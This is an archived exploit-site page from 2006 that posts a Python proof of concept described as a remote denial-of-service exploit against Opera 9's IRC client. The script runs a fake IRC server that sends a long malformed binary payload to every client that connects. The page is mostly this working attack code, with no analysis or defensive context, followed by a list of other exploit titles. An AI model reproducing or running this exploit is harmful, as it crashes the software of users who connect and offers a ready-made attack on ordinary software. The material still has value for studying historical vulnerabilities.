exploits , vulnerabilities , articles , Opera 9 IRC Client Remote Denial of Service Exploit (py)

2006-08-13 Opera 9 IRC Client Remote Denial of Service Exploit (c)
2006-07-01 Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit
2006-06-21 Opera 9 (long href) Remote Denial of Service Exploit
2006-05-25 Opera >8.x DOS
2005-11-30 QNX Realtime Operating System (RTOS) "phgrafx" Local Buffer Overflow Exploit

2006-08-13

Opera 9 IRC Client Remote Denial of Service Exploit (py)

Rated as : High Risk

#!/usr/bin/python

#
# Opera 9 IRC client DOS
# NNP + Preddy
# http://silenthack.co.uk
# http://smashthestack.org
# http://www.team-rootshell.com
#

import socket

die = '''\x3a\x61\x61\x61\x20\x33\x35\x33
\x20\x15\xf8\x9c\x71\x0a\x3a\x64
\xff\x26\xf8\x9b\x33\xd2\x9b\x34
\xa4\xa7\x7d\x62\xd1\xa8\x2f\xb8
\x9a\x85\x63\x3e\x1e\x9e\xe6\xa6
\xb3\xde\x42\x25\xe8\x7c\x89\xe7
\xa2\x81\x83\xd6\x53\x1e\x0a\xf7
\xc5\x87\x59\x97\x2f\x88\x4f\xc9
\x0d\xb2\x07\x2b\x50\xed\xd1\x03
\xcb\x13\x28\xb3\x90\xb1\x9b\x32
\x32\x1e\x08\x85\x3c\x13\x7c\x02
\x9a\xd6\x99\xca\x5e\xe8\x93\x6c
\x9a\x9b\x97\xea\x88\x69\xed\x54
\x7c\x16\x07\x0c\xc7\xa2\x3f\xfa
\xc0\x47\x7f\xfd\x5a\xfc\xff\xf5
\xd2\x98\xbf\x30\x80\x52\x9c\x1a
\xed\x34\x04\x76\x9d\xf1\xca\x19
\x07\xd1\x26\xcf\x74\x65\xc9\x34
\xac\x48\x31\x07\x44\x30\xfc\x16
\xc8\xbb\x47\x48\x0d\xe3\x62\xfb
\x17\x66\x71\xb4\x58\x3b\xce\x5f
\x0c\xf4\x2e\x80\x59\xf7\xb5\x05
\x40\xe6\x0c\x84\x17\x08\x9b\xdf
\xc3\xe2\x28\xd1\xc5\x8a\xcc\xdd
\xf1\x3d\x91\x49\x78\x5f\xa8\x84
\x53\xd7\x05\xac\xce\xba\xb2\x0e
\xa0\xbe\x93\xb7\xc7\x2e\x97\x8a
\x10\xbf\x5b\xd5\x49\x27\xb2\x3a
\x64\x44\x83\xdc\xa3\x2c\x61\xf7
\x03\x66\xa3\xd1\x20\x55\xe0\xc0
\x14\x73\x78\xdb\xa1\x0f\x65\xb1
\xce\xc1\x86\x17\xe8\x39\x52\x4d
\x7d\xd5\x29\x20\x01\x8a\x17\x04
\xf0\xbb\xd6\x10\x10\xb6\xd1\x24
\x29\x49\xff\xca\x58\x65\x7b\x26
\x26\x01\x3d\x0e\x3a\x8f\x5b\xb7
\x65\x85\xd8\x66\x0f\xef\x6b\x00
\xaa\x41\x10\xbb\xf7\xe1\xdf\x20
\x2a\xdf\xea\x82\x44\x65\xa8\x6a
\x66\xe6\x78\xa1\x75\xd4\x58\xda
\x59\x30\x41\x68\x20\xac\x68\xca
\xed\x79\x85\xe4\x5a\x65\x04\x85
\x44\xee\x07\x88\x53\xb0\xf2\xb9
\x96\x6a\x5a\x0b\x3e\xb3\xe6\x97
\xe3\x27\x00\x03\xd3\x68\xce\xc0
\xe1\x53\xa4\x3c\xb8\xa8\xc1\xfc
\x96\xc8\x84\xe9\x78\x76\xa2\x0e
\xe1\xfd\x1a\x1f\xb0\x00\xb7\x93
\x27\xb7\x97\xfa\x1f\x65\xba\x01
\xb8\x5e\x3d\x71\x06\xfe\x6d\x9c
\xc6\xf2\x85\x3f\x68\x27\x4d\x49
\x24\x67\x69\xd4\x67\x20\x68\x8e
\xd7\xff\x88\xf6\x64\x42\xf7\x1c
\xa0\x34\x8d\xa6\x32\xfb\x42\xf9
\xed\xc7\x38\x55\xef\x85\x9f\x13
\xed\x08\xe8\x54\x28\x50\xe3\xff
\x4f\x6b\xf5\xb3\xae\xed\xcf\x4e
\x21\x5d\xf5\x54\x58\x37\x4d\x45
\xff\x85\x9a\xee\x0a\x39\x01\xf7
\x41\xe9\x4c\x69\x39\x2f\x68\x88
\x9a\x5e\x3b\x48\x4b\x0b\x97\x6c
\x68\x8c\xc0\xc0\xc3\x0d\x05\xc2
\x92\x9f\xb0\x9d\xd9\xb2\x94\x1a
\x9b\xe0\x84\xd5\x0f\xec\x5d\xaa
\x4a\x99\xf2\x95\xa4\x89\x02\x0c
\x15\xc2\xcc\xd9\xd0\xd1\x9b\x62
\x70\x4c\xff\x49\xfe\x94\x64\x99
\x74\xe8\x6e\x84\xd4\xcc\x2e\x1f
\x65\x20\xb4\x09\xaa\xb6\x15\xbf
\x79\xe1\x98\x49\xb2\x34\xab\x22
\x80\xab\x6c\x7e\x3f\xd0\x17\xb3
\xb8\x86\x37\x8c\x52\x65\xab\xb7
\x86\x60\xc0\x30\x16\xd5\xef\x8f
\xb6\x88\xd8\x68\xbc\x84\x8a\x3c
\x2f\xf6\xba\x6e\xc6\xd1\x21\x7e
\x57\x59\x0b\xa9\xbe\xb6\x60\x44
\x16\x20\x74\x2d\xf5\x64\xbc\xab
\xec\x95\x13\xa8\x19\x9e\xe4\x48
\x94\x9e\xb6\x5b\x6f\xd7\xd9\xc7
\x30\xe4\x70\xef\x9b\xd1\x33\xb1
\xf1\xa8\xde\xe7\x0c\x9b\x92\xf8
\x30\xa6\xa0\x49\x44\x84\x91\xd8
\x22\x47\x33\x91\x1e\x0d\x58\x4f
\xf1\xc9\x3e\x8c\x9a\x71\x3e\x8b
\x19\x1c\x72\x25\xb7\x05\x1d\xe7
\xab\xbd\x30\xef\x41\xc1\xc7\x63
\x08\xfb\xf5\x27\x08\x4d\x76\xf9
\x16\xb4\x86\xb0\x25\xc4\x3c\x3f
\xe0\xae\x64\x98\xb3\x82\x7f\x5e
\x3f\xb0\x4d\x81\x71\x15\xe4\x7a
\x10\xd9\xa1\x18\x27\x17\x11\x3d
\xcb\x97\xee\xf0\x5b\x2a\x2f\x3c
\xd8\x94\xd4\x8c\x16\x53\xea\x55
\x03\x38\xd6\x75\x4d\xbb\xef\x5d
\x94\x90\x75\xbb\xa7\x86\xf9\x72
\x1e\xe7\x62\x79\x11\x92\xb5\xe9
\x26\x89\x75\x3c\xdd\x60\x91\xe0
\x98\x68\x55\xe5\x23\x44\x42\xb7
\xd4\xb7\x73\x7b\x3d\x6c\xed\x5b
\x53\x50\xd5\x64\xe2\x8a\x4d\x08
\x14\xc3\x44\xf1\x23\xd5\xd1\xbb
\x3d\x27\xa0\x60\x6b\xe2\x18\x40
\x99\x8b\xbb\xd6\xf7\xa9\x32\x4a
\xf9\x07\xae\xdb\x91\xfb\xe3\xa5
\xbe\x27\x96\xe1\xfc\x68\x9c\x3a
\x8f\x3c\x9a\xfa\x1e\xb2\x3a\xb7
\x3d\xf6\x8e\x34\x9f\xc0\x7e\x98
\xc7\x2c\x73\x58\x28\x56\xfe\xe6
\x7d\x94\xc8\x79\xfc\x64\xb3\x8b
\xa1\x4e\x86\xbf\x00\xc0\x77\x3e
\xb6\x05\x72\x55\xc5\xf1\xed\x8c
\x1d\x60\xe4\x45\xb6\xe2\x2c\x33
\x77\xf4\xad\x73\x58\x60\xff\xf9
\xae\x85\xb9\xaf\x45\x30\xed\xfc
\x35\x5f\x51\xfa\x50\x3f\x86\x6e
\x9f\x6a\xb3\x56\x4d\xdf\x89\xc4
\xd3\x36\x37\x2c\x97\x36\x25\x45
\xbb\xde\xf4\x01\x0e\xe1\xfd\x43
\x41\x4e\x3d\x91\x8d\xc3\xff\x2d
\x2e\xb3\x83\x7b\x92\x0c\x3f\x66
\x43\x76\x92\xda\xad\xb7\x1f\x68
\x96\x14\x69\xa4\xf5\x66\xe8\x36
\xb5\x25\xc8\x42\xe9\xc7\x6f\x17
\x7a\xf2\x92\x0d\xff\xd1\x73\x42
\x47\x05\x1c\xf4\xbc\x3b\x5d\x52
\x4f\xc6\xf7\x45\x2d\xdf\x7b\xe2
\x04\x43\x24\xed\x0b\x94\x04\x85
\x86\x96\x92\x85\x67\x05\xc7\xaf
'''

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 6667))
s.listen(5)

while 1:
    (clientsock, address) = s.accept()
    sent = clientsock.send(die)
    print "Sent %d bytes" % sent
    sent = 0


securitydot.net - 2006-08-13

Exploits - newest 10 RSS | More

2007-06-15 57299 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34222 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42446 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29342 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19780 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16714 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19416 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16599 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33615 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17240 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit